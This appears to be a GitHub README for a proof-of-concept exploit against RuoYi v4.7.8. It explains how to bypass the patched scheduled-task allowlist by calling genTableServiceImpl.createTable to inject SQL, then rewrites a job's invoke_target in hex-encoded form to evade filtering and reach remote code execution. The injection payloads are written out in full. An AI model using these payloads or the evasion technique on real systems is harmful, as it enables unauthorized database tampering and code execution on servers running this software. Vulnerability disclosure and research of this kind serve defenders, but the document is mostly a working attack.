Skip to content

Latest commit

 

History

History
43 lines (25 loc) · 1.28 KB

README.md

File metadata and controls

43 lines (25 loc) · 1.28 KB

RuoYi-v4.7.8-RCE-POC

The system had vulnerabilities in the scheduled tasks before, and now I bypass it.

Sqli

In the patch, a strategy using blacklisting and whitelisting was employed.

截屏2024-02-25 15.22.37

However, I managed to bypass it by using a whitelist class and successfully carried out an SQL injection.

genTableServiceImpl.createTable('SELECT 1 FROM 'Hack By 1ue';')

img

genTableServiceImpl.createTable('UPDATE sys_job SET invoke_target = 'Hack By 1ue' WHERE job_id = 1;')

img

success to change the data of table job_id

RCE

JobInvokeUtildoes not allow parentheses in the string during invocation, so I modified the parameter value of a specific job in the original job table to hexadecimal (bypassing defense detection), enabling another scheduled task for Remote Code Execution (RCE).

img

genTableServiceImpl.createTable('UPDATE sys_job SET invoke_target = 0x6a61... WHERE job_id = 2;')

截屏2024-02-25 15.18.34

the job's invoke_target changed

img

and then execute!